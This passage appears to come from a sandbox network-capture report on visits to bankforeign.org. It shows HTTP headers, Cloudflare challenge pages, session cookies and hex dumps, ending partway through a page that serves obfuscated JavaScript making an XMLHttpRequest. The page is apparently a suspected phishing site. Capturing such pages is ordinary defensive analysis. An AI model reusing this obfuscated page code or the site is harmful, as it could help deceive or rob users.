                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8T7oKnuqrJzthJOZvacBAbHlvoWjIrFhn6h7L%2FO1Hxrg7DY8mI%2BnqcKgN3yUqxgj4gzd987h%2BGh6baYgVL3L5PVl6J6aJ2qPekFYCGPfq2rFgE7uin%2BfbJcBMczWACrB6qI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffca1f686743-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.449771104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:38 UTC939OUTGET /favicon.ico HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://bankforeign.org/?__cf_chl_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFA
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:38 UTC1355INHTTP/1.1 403 Forbidden
                                                            Date: Thu, 01 Feb 2024 20:38:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 13973
                                                            Connection: close
                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Resource-Policy: same-origin
                                                            Origin-Agent-Cluster: ?1
                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            Referrer-Policy: same-origin
                                                            X-Frame-Options: SAMEORIGIN
                                                            cf-mitigated: challenge
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uNYBg81%2BCsBNszntAnI6uaIX2UzflAcg9b0weHjcz4ApmpUwk6Ns9ff%2BFbea4T1jyqQBYlB41MomciDiFLnboKvnFPDN1zglE6xsfo2rKPJASKs4XtI9tdm0JDDwRjiFUo4%3D"}],"group":"cf-nel","max_age":604800}
                                                            2024-02-01 20:38:38 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 65 63 66 66 63 62 30 39 62 33 37 63 63 34 2d 41 54 4c 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84ecffcb09b37cc4-ATLalt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:38 UTC1234INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c
                                                            Data Ascii: IzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1L
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 69 67 68 74 2d 6d 6f 64 65 3b 7d 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 26 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32
                                                            Data Ascii: ight-mode;}}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3;&:hover{text-decoration:underline;color:#ee730a}}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61
                                                            Data Ascii: MS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:conta
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 23 66 66 66 7d 7d 2e 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 7b 26 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72
                                                            Data Ascii: #fff}}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.clearfix{&:after{display:table;clear:both;content:""}.column{float:left;padding-r
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 64 79 2c 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72
                                                            Data Ascii: dy,.main-wrapper{display:block}}</style><meta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 53 54 50 66 4f 76 52 69 7a 68 58 51 63 45 74 36 51 57 58 58 38 70 54 41 70 69 4d 77 6d 56 5f 73 50 49 4b 35 31 35 30 4f 47 57 43 41 69 44 4e 34 74 6c 66 31 78 65 36 69 45 38 76 49 31 30 61 54 50 4e 33 4c 64 64 33 65 39 69 68 74 59 4c 43 37 6e 47 61 67 5f 4b 34 45 31 77 5f 75 52 46 65 6f 33 52 58 4e 66 36 54 7a 62 7a 56 51 59 32 4b 45 73 2d 4b 52 77 70 62 70 32 53 6e 47 41 36 4f 6e 41 34 4d 61 50 75 69 42 56 46 38 44 48 41 49 72 56 30 44 36 75 33 52 74 50 2d 37 6e 31 72 4d 78 45 50 38 67 4f 36 75 64 2d 32 53 5a 41 55 64 44 78 6c 5a 70 47 32 75 4d 6a 51 6a 37 33 6e 69 59 52 57 51 79 43 61 31 6d 63 72 76 62 38 62 41 4f 64 30 37 75 6b 55 35 30 33 44 4c 6f 55 6b 69 4f 45 78 69 41 42 5a 55 56 4b 4a 53 44 6b 50 64 42 37 64 4e 50 32 5f 6f 71 5f 43 4c 52 34 34 79
                                                            Data Ascii: STPfOvRizhXQcEt6QWXX8pTApiMwmV_sPIK5150OGWCAiDN4tlf1xe6iE8vI10aTPN3Ldd3e9ihtYLC7nGag_K4E1w_uRFeo3RXNf6TzbzVQY2KEs-KRwpbp2SnGA6OnA4MaPuiBVF8DHAIrV0D6u3RtP-7n1rMxEP8gO6ud-2SZAUdDxlZpG2uMjQj73niYRWQyCa1mcrvb8bAOd07ukU503DLoUkiOExiABZUVKJSDkPdB7dNP2_oq_CLR44y
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 31 46 65 58 41 49 51 7a 7a 36 44 61 6e 66 38 46 46 42 53 32 68 68 49 7a 76 32 61 65 71 76 58 64 34 77 5a 41 56 52 69 56 4a 51 4f 35 4c 6c 34 50 4d 46 72 4b 4d 6e 36 57 36 70 50 53 6d 46 4e 35 6e 33 31 35 37 76 37 76 53 6b 63 36 51 66 44 39 53 4e 59 4f 42 6e 78 5a 54 32 49 4e 39 38 5a 76 52 49 44 77 36 53 33 51 44 31 42 73 35 4d 6a 56 43 6f 72 51 4c 32 6d 5f 30 72 6f 6c 42 4c 52 39 5f 69 66 42 7a 66 39 53 53 30 32 43 54 73 67 31 43 5a 4f 35 36 77 70 65 43 6c 35 4c 2d 4d 6a 78 4b 65 63 59 4b 47 44 38 75 49 37 2d 55 55 31 49 46 74 50 31 52 68 63 41 66 62 47 43 30 6a 78 42 49 59 6a 6f 6b 45 4a 64 51 39 6e 5a 79 51 50 33 69 4c 49 54 6f 4d 4e 31 44 54 58 5a 63 58 6e 5f 75 30 6b 41 56 52 6d 69 6f 6b 6e 51 31 59 72 2d 4d 74 32 73 56 47 4f 7a 31 43 41 54 66 59 54
                                                            Data Ascii: 1FeXAIQzz6Danf8FFBS2hhIzv2aeqvXd4wZAVRiVJQO5Ll4PMFrKMn6W6pPSmFN5n3157v7vSkc6QfD9SNYOBnxZT2IN98ZvRIDw6S3QD1Bs5MjVCorQL2m_0rolBLR9_ifBzf9SS02CTsg1CZO56wpeCl5L-MjxKecYKGD8uI7-UU1IFtP1RhcAfbGC0jxBIYjokEJdQ9nZyQP3iLIToMN1DTXZcXn_u0kAVRmioknQ1Yr-Mt2sVGOz1CATfYT
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 41 52 53 6f 59 6e 64 32 6c 7a 78 4e 66 50 6f 41 6d 71 4d 59 61 4f 64 78 53 4f 36 68 56 58 31 52 44 65 59 4f 66 59 61 64 71 7a 41 4a 53 53 51 7a 36 75 76 41 72 6c 6d 5f 38 53 6d 69 32 77 70 6d 6e 73 67 4b 33 62 37 42 69 32 4b 59 6b 69 46 44 5f 33 56 39 4d 36 4c 4c 57 79 30 49 61 58 65 39 73 33 73 67 53 34 65 47 49 71 67 6a 34 44 37 64 30 4d 33 45 31 77 4e 54 33 32 36 75 72 4b 5a 72 45 52 68 30 5f 5a 79 6d 70 48 6e 42 48 4c 59 4e 57 74 38 5a 44 58 38 58 4e 5a 36 36 56 45 74 6c 4a 53 70 69 6c 76 68 7a 63 53 6d 6a 46 4e 75 46 50 35 68 70 41 73 4d 58 52 5a 69 43 5f 52 4c 38 52 51 71 75 39 2d 75 62 33 61 5f 43 49 38 44 48 68 61 67 56 63 44 43 61 46 73 75 6b 66 55 55 6e 55 79 77 53 59 41 34 6e 53 41 47 78 4d 44 43 32 65 51 34 4a 50 35 54 66 47 70 54 30 36 53 6c
                                                            Data Ascii: ARSoYnd2lzxNfPoAmqMYaOdxSO6hVX1RDeYOfYadqzAJSSQz6uvArlm_8Smi2wpmnsgK3b7Bi2KYkiFD_3V9M6LLWy0IaXe9s3sgS4eGIqgj4D7d0M3E1wNT326urKZrERh0_ZympHnBHLYNWt8ZDX8XNZ66VEtlJSpilvhzcSmjFNuFP5hpAsMXRZiC_RL8RQqu9-ub3a_CI8DHhagVcDCaFsukfUUnUywSYA4nSAGxMDC2eQ4JP5TfGpT06Sl


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.449772104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:38 UTC473OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:38 UTC717INHTTP/1.1 400 Bad Request
                                                            Date: Thu, 01 Feb 2024 20:38:38 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: J38eRO/LSfr2xzg8ktY0Vg==$Lla+0hL6Vb9d2/FEr77Fww==
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7Jj7sBrL7Th7m2waif7s7Rf5UEeIHCskuM8Dk738%2BUJTUfsVfJfbec3B%2BxcoIvXDWV3wTFyBIjVoft9y%2BNJfqyAI7TKASEtbKclzN6c90O6T9528%2BnjD%2FtngGUJS%2Bk1FdFo%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffcb096e244e-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:38 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                            Data Ascii: 7invalid
                                                            2024-02-01 20:38:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.449773104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:41 UTC1384OUTGET /21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-platform: "Windows"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            Referer: https://bankforeign.org/?__cf_chl_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFA
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:42 UTC580INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4QLJDVJK%2BYaEgwCmEtB6MLVtyR%2FzLYfokRG0LxUBUWCk%2BG2g04uo605bLGp7eQkW9oLIArzbE3NU%2ByDJY0is8zdx3dG4NSSdpM4vUWifRsSArzjYGK%2F%2FjwEq9q2HdMJRDyQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffdd1a434525-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:42 UTC789INData Raw: 31 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 71 2f 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 32 36 35 61 64 63 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72
                                                            Data Ascii: 1170<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title></title> <script src="jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc"></script> <script sr
                                                            2024-02-01 20:38:42 UTC1369INData Raw: 28 70 61 72 73 65 49 6e 74 28 4b 28 27 30 78 31 38 30 27 29 29 2f 30 78 39 29 3b 69 66 28 58 3d 3d 3d 54 29 62 72 65 61 6b 3b 65 6c 73 65 20 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 79 29 7b 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 49 2c 30 78 36 64 65 66 31 29 29 3b 76 61 72 20 47 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 71 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 54 2c 53 29 7b 76 61 72 20 58 3d 71 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 3b 69 66 28 53 29 7b 76 61 72 20 79 3d 53 5b 74 28 27 30 78 31 34 64 27 29 5d 28 54 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 53 3d 6e 75 6c 6c 2c 79 3b 7d 7d
                                                            Data Ascii: (parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x14d')](T,arguments);return S=null,y;}}
                                                            2024-02-01 20:38:42 UTC1369INData Raw: 66 29 5d 28 66 29 2c 45 3d 58 5b 79 5d 2c 6e 3d 53 5b 45 5d 7c 7c 57 3b 57 5b 6d 28 27 30 78 31 34 39 27 29 5d 3d 66 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 66 29 2c 57 5b 6d 28 30 78 31 35 64 29 5d 3d 6e 5b 6d 28 30 78 31 35 64 29 5d 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 6e 29 2c 53 5b 45 5d 3d 57 3b 7d 7d 29 3b 56 28 29 3b 76 61 72 20 78 68 74 74 70 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 76 61 72 20 67 3d 5b 27 62 69 6e 64 27 2c 27 6c 69 6e 6b 27 2c 27 63 68 61 69 6e 27 2c 27 32 71 6e 46 73 54 77 27 2c 27 72 65 73 70 6f 6e 73 65 54 65 78 74 27 2c 27 73 65 61 72 63 68 27 2c 27 2e 2f 31 27 2c 27 69 6e 69 74 27 2c 27 72 65 6c 27 2c 27 61 63 74 69 6f 6e 27 2c 27 63 72 65 61 74 65 45 6c 65 6d
                                                            Data Ascii: f)](f),E=X[y],n=S[E]||W;W[m('0x149')]=f[m('0x16f')](f),W[m(0x15d)]=n[m(0x15d)][m('0x16f')](n),S[E]=W;}});V();var xhttp=new XMLHttpRequest();function I(){var g=['bind','link','chain','2qnFsTw','responseText','search','./1','init','rel','action','createElem
